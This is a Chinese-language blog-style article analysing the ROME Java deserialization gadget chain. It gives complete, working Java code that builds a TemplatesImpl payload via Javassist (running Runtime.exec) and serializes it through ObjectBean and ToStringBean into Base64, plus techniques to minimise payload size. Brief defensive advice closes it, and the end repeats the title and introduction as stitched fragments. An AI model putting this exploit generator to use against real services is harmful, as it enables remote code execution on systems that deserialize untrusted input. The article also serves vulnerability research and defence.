Java反序列化漏洞分析：ROME链与Payload最小化技术<\/h1>

前言<\/h2>
ROME链是Java反序列化漏洞利用链的一种，与Commons Collections 2 (CC2)链类似，都是通过配合TemplatesImpl实现代码注入。本文将详细分析ROME链的工作原理，并探讨如何将生成的Payload进行最小化优化。<\/p>

环境搭建<\/h2>

所需依赖<\/h3>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>junit<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>junit<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>4.11<\/version><\/span>
<\/span><\/span>        <scope><\/span>test<\/scope><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>rome<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>rome<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>1.0<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.javassist<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>javassist<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>3.28.0-GA<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>关键组件<\/h3>

ROME库：提供ObjectBean和ToStringBean类<\/li>
Javassist：用于动态生成恶意类字节码<\/li>
TemplatesImpl：最终执行恶意代码的载体<\/li>
<\/ul>
漏洞链分析<\/h2>
完整调用链<\/h3>
* HashMap<K,V>.readObject(ObjectInputStream)
* HashMap<K,V>.hash(Object)
* ObjectBean.hashCode()
* EqualsBean.beanHashCode()
* ObjectBean.toString()
* ToStringBean.toString()
* ToStringBean.toString(String)
* Method.invoke(Object, Object...)
* DelegatingMethodAccessorImpl.invoke(Object, Object[])
* NativeMethodAccessorImpl.invoke(Object, Object[])
* NativeMethodAccessorImpl.invoke0(Method, Object, Object[])
* TemplatesImpl.getOutputProperties()
<\/code><\/pre>
关键点说明<\/h3>

入口点<\/strong>：HashMap的readObject方法，这是Java反序列化的常见入口<\/li>
触发路径<\/strong>：通过HashMap的hash方法调用ObjectBean的hashCode<\/li>
简化路径<\/strong>：可以直接将_obj设置为ToStringBean，跳过ObjectBean.toString()<\/li>
关键调用<\/strong>：ToStringBean.toString()会反射调用对象的getter方法<\/li>
最终执行<\/strong>：通过TemplatesImpl的getOutputProperties方法触发代码执行<\/li>
<\/ol>
Payload构造<\/h2>
基础Payload构造<\/h3>
public<\/span> class<\/span> BasicPayload<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 1. 使用Javassist创建恶意类
<\/span><\/span><\/span><\/span>        ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>        CtClass ctClass =<\/span> pool.<\/span>get<\/span>(<\/span>Evil.<\/span>class<\/span>.<\/span>getName<\/span>());<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> bytes =<\/span> ctClass.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 设置TemplatesImpl
<\/span><\/span><\/span><\/span>        TemplatesImpl templatesImpl =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setFieldValue(<\/span>templatesImpl,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bytes});<\/span>
<\/span><\/span>        setFieldValue(<\/span>templatesImpl,<\/span> "_name"<\/span>,<\/span> "a"<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>templatesImpl,<\/span> "_tfactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 构造ROME链
<\/span><\/span><\/span><\/span>        ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span> templatesImpl);<\/span>
<\/span><\/span>        ObjectBean objectBean =<\/span> new<\/span> ObjectBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span> toStringBean);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 4. 放入HashMap触发
<\/span><\/span><\/span><\/span>        Map hashMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>objectBean,<\/span> "x"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化
<\/span><\/span><\/span><\/span>        ByteArrayOutputStream bs =<\/span> unSerial(<\/span>hashMap);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Payload最小化技术<\/h3>
1. Javassist优化<\/h4>
原始方式生成的类较大，可以通过以下方式优化：<\/p>
CtClass ctClass =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"i"<\/span>);<\/span>
<\/span><\/span>CtClass superClass =<\/span> pool.<\/span>get<\/span>(<\/span>"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"<\/span>);<\/span>
<\/span><\/span>ctClass.<\/span>setSuperclass<\/span>(<\/span>superClass);<\/span>
<\/span><\/span>CtConstructor constructor =<\/span> ctClass.<\/span>makeClassInitializer<\/span>();<\/span>
<\/span><\/span>constructor.<\/span>setBody<\/span>(<\/span>"Runtime.getRuntime().exec(\"calc.exe\");"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>优化点：<\/p>

使用简短的类名"i"<\/li>
直接设置类初始化器，省略try-catch块<\/li>
最小化字节码结构<\/li>
<\/ul>
2. 删除冗余字段<\/h4>
通过反射删除不影响反序列化过程的字段：<\/p>
setFieldValue(<\/span>objectBean,<\/span> "_cloneableBean"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>objectBean,<\/span> "_toStringBean"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3. 最终优化后的Payload<\/h4>
import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> com.sun.syndication.feed.impl.ObjectBean;<\/span>
<\/span><\/span>import<\/span> com.sun.syndication.feed.impl.ToStringBean;<\/span>
<\/span><\/span>import<\/span> javassist.ClassPool;<\/span>
<\/span><\/span>import<\/span> javassist.CtClass;<\/span>
<\/span><\/span>import<\/span> javassist.CtConstructor;<\/span>
<\/span><\/span>import<\/span> javax.xml.transform.Templates;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectOutputStream;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.util.Base64;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> OptimizedPayload<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 1. 最小化恶意类
<\/span><\/span><\/span><\/span>        ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>        CtClass ctClass =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"i"<\/span>);<\/span>
<\/span><\/span>        CtClass superClass =<\/span> pool.<\/span>get<\/span>(<\/span>"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"<\/span>);<\/span>
<\/span><\/span>        ctClass.<\/span>setSuperclass<\/span>(<\/span>superClass);<\/span>
<\/span><\/span>        CtConstructor constructor =<\/span> ctClass.<\/span>makeClassInitializer<\/span>();<\/span>
<\/span><\/span>        constructor.<\/span>setBody<\/span>(<\/span>"Runtime.getRuntime().exec(\"calc.exe\");"<\/span>);<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> bytes =<\/span> ctClass.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 设置TemplatesImpl
<\/span><\/span><\/span><\/span>        TemplatesImpl templatesImpl =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setFieldValue(<\/span>templatesImpl,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bytes});<\/span>
<\/span><\/span>        setFieldValue(<\/span>templatesImpl,<\/span> "_name"<\/span>,<\/span> "a"<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>templatesImpl,<\/span> "_tfactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 构造最小化ROME链
<\/span><\/span><\/span><\/span>        ToStringBean toStringBean =<\/span> new<\/span> ToStringBean(<\/span>Templates.<\/span>class<\/span>,<\/span> templatesImpl);<\/span>
<\/span><\/span>        ObjectBean objectBean =<\/span> new<\/span> ObjectBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span> toStringBean);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 4. 删除冗余字段
<\/span><\/span><\/span><\/span>        setFieldValue(<\/span>objectBean,<\/span> "_cloneableBean"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        setFieldValue(<\/span>objectBean,<\/span> "_toStringBean"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 5. 放入HashMap
<\/span><\/span><\/span><\/span>        Map hashMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>objectBean,<\/span> "x"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 6. 序列化并输出Base64
<\/span><\/span><\/span><\/span>        ByteArrayOutputStream bs =<\/span> unSerial(<\/span>hashMap);<\/span>
<\/span><\/span>        Base64Encode(<\/span>bs);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 辅助方法保持不变
<\/span><\/span><\/span><\/span>    private<\/span> static<\/span> ByteArrayOutputStream unSerial<\/span>(<\/span>Map hashMap)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        ByteArrayOutputStream bs =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream out =<\/span> new<\/span> ObjectOutputStream(<\/span>bs);<\/span>
<\/span><\/span>        out.<\/span>writeObject<\/span>(<\/span>hashMap);<\/span>
<\/span><\/span>        ObjectInputStream in =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>bs.<\/span>toByteArray<\/span>()));<\/span>
<\/span><\/span>        in.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>        in.<\/span>close<\/span>();<\/span>
<\/span><\/span>        return<\/span> bs;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    private<\/span> static<\/span> void<\/span> Base64Encode<\/span>(<\/span>ByteArrayOutputStream bs)<\/span> {<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> encode =<\/span> Base64.<\/span>getEncoder<\/span>().<\/span>encode<\/span>(<\/span>bs.<\/span>toByteArray<\/span>());<\/span>
<\/span><\/span>        String s =<\/span> new<\/span> String(<\/span>encode);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>s);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>s.<\/span>length<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    private<\/span> static<\/span> void<\/span> setFieldValue<\/span>(<\/span>Object obj,<\/span> String field,<\/span> Object arg)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Field f =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>field);<\/span>
<\/span><\/span>        f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        f.<\/span>set<\/span>(<\/span>obj,<\/span> arg);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>优化效果<\/h3>

原始Payload大小：3408字符(Base64编码后)<\/li>
初步优化后：1932字符<\/li>
最终优化后：1696字符<\/li>
<\/ol>
技术要点总结<\/h2>

ROME链核心<\/strong>：利用ToStringBean的toString方法反射调用getter<\/li>
TemplatesImpl利用<\/strong>：通过_bytecodes注入恶意字节码<\/li>
最小化原则<\/strong>：

使用最短的类名和方法名<\/li>
删除所有不必要的字段和结构<\/li>
精简字节码生成逻辑<\/li>
<\/ul>
<\/li>
关键反射点<\/strong>：必须保留影响反序列化路径的字段，其余可删除<\/li>
<\/ol>
防御建议<\/h2>

升级ROME库到安全版本<\/li>
使用反序列化过滤器(ObjectInputFilter)<\/li>
禁止反序列化不可信数据<\/li>
使用白名单机制控制可反序列化的类<\/li>
<\/ol>
通过本文的分析，我们深入理解了ROME反序列化漏洞链的工作原理，并掌握了Payload最小化的关键技术，这对于漏洞研究和防御都具有重要意义。<\/p>
Java反序列化漏洞分析：ROME链与Payload最小化技术<\/h1>

前言<\/h2> ROME链是Java反序列化漏洞利用链的一种，与Commons Collections 2 (CC2)链类似，都是通过配合TemplatesImpl实现代码注入。本文将详细分析ROME链的工作原理，并探讨如何将生成的Payload进行最小化优化。<\/p>

环境搭建<\/h2>

漏洞链分析<\/h2>

Payload构造<\/h2>

Payload最小化技术<\/h3>

前言<\/h2>
ROME链是Java反序列化漏洞利用链的一种，与Commons Collections 2 (CC2)链类似，都是通过配合TemplatesImpl实现代码注入。本文将详细分析ROME链的工作原理，并探讨如何将生成的Payload进行最小化优化。<\/p>
